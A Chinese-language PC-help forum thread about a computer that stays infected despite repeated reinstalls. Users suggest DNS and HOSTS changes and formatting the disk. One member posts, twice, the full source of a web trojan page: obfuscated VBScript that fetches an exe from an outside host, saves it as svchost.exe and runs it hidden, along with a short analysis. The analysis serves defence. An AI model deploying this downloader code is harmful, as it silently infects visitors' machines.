换了6次系统，重分了3次区无济于事啊！这次附上扫描结果。

sensai01

IP和DNS都是自动获取的呀~怎么屏蔽?

银砾石

网上邻居-本地连接-TCP/IP协议里可以改DNS

HOST文件里吧那个地址设为127.0.0.1

zhaonimm

原帖由 wangjay1980 于 2007-4-8 16:04 发表
<exflashservice><; "C:\Program Files\EPOX\EFS\EZ_FLASH_SERVICE.exe" "5000">  [N/A]
    <ManualRun><; "H:\AUTORUN\AutoRun">  [N/A]
删除了，然后装个防火墙
另外把桌面的IE快捷方式删除，重建一个

要是你的硬盘重新分区的话  不能在H盘出现这个啊AUTORUN\AutoRun
你的H盘不是光驱把........

sensai01

我分了5个区   H盘是光驱。

sensai01

有必要吗？IP和DNS都是自动获取，每次电脑重新启动地址都不一样的啊。

ooo-ppp

http://www.zhulinfeng.com/bbs

试了试，比较郁闷的是那个木马程序在我的电脑上运行不了～～汗～～一运行就出错～

http://w.qbbd.com/0.htm  

0.htm源码：
<SCRIPT language=VBScript>
on error resume next
****ie = "http://d.qbbd.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-

65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"  
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, ****ie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>




svchost.vbs源码：
Set Shell = CreateObject("Sh"&"ell"&".App"&"lic"&"at"&"ion")
Shell.ShellExecute"C:\DOCUME~1\MuseHero\LOCALS~1\Temp\svchost.exe","","","o"&"p"&"e"&"n",0



从上面的源码可以看出，这是一个标准的网页木马～（大家不要拿去害人啊～）

会下载svchost.exe并用VBScript来执行～

在我机器上执行后调用了两个系统程序后就出错退出了～没见有后继动作。

重启了两次，也没发现什么异常～那个网页文件与木马程序也能直接删除～

没发现什么特别的～

最近忙着升级5.0.1.0没时间反汇编这个木马～不过，应该是没什么特别的～

不知道那位朋友怎么会被搞的那么惨～让他用狙剑的文件监控试一试，看看弹出的IE是谁打开的，不就找到木马程序了么～～

汗～～格式化分区都不行～～还真是想不出有什么木马会这么牛～～应该是其它原因吧～

ooo-ppp

http://www.zhulinfeng.com/bbs

试了试，比较郁闷的是那个木马程序在我的电脑上运行不了～～汗～～一运行就出错～

http://w.qbbd.com/0.htm  

0.htm源码：
<SCRIPT language=VBScript>
on error resume next
****ie = "http://d.qbbd.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-

65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"  
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, ****ie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>




svchost.vbs源码：
Set Shell = CreateObject("Sh"&"ell"&".App"&"lic"&"at"&"ion")
Shell.ShellExecute"C:\DOCUME~1\MuseHero\LOCALS~1\Temp\svchost.exe","","","o"&"p"&"e"&"n",0



从上面的源码可以看出，这是一个标准的网页木马～（大家不要拿去害人啊～）

会下载svchost.exe并用VBScript来执行～

在我机器上执行后调用了两个系统程序后就出错退出了～没见有后继动作。

重启了两次，也没发现什么异常～那个网页文件与木马程序也能直接删除～

没发现什么特别的～

最近忙着升级5.0.1.0没时间反汇编这个木马～不过，应该是没什么特别的～

不知道那位朋友怎么会被搞的那么惨～让他用狙剑的文件监控试一试，看看弹出的IE是谁打开的，不就找到木马程序了么～～

汗～～格式化分区都不行～～还真是想不出有什么木马会这么牛～～应该是其它原因吧～

ballakay

把硬盘全格!

eyeyoureyes

你是不是用的拨号软件有问题？我觉得可能性很大。